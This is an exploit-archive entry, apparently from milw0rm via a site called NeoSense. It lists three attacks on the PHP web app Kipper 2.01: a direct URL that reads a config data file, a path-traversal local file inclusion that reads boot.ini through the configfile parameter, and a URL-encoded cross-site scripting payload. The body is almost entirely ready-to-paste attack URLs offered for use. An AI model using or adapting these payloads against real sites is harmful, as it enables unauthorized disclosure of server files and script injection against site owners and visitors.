[] NeoSense
E X P L O I T S
title author type platform port cve id

Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure

Author: RoMaNcYxHaCkEr
type: webapps
platform: php
port: 
date_added: 2009-02-04 
date_updated:  
verified: 1 
codes: OSVDB-52549;CVE-2009-0767;OSVDB-52548;CVE-2009-0766;OSVDB-52547;CVE-2009-0765;OSVDB-52546;CVE-2009-0764;OSVDB-52545;OSVDB-52544;CVE-2009-0763 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Kipper 2.01 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )

# Download From : http://www.bookelves.com/kipper/files/kipper20.zip

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote Data Reading :

http://localhost/kipper20/job/config.data

# Exploit [2]:

- Local File Include :

http://localhost/kipper20/index.php?configfile=../../../../boot.ini

# Exploit [3]:

- Remote XSS :

http://localhost/kipper20/default.php?charm=%3E%20%3E%20ScRiPt%20%3EALERT%20529227151633%20%3B%20%2FScRiPt%3E#685828818694793444

# EOF ..

# rXh

# bEST wISHES

# milw0rm.com [2009-02-05]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.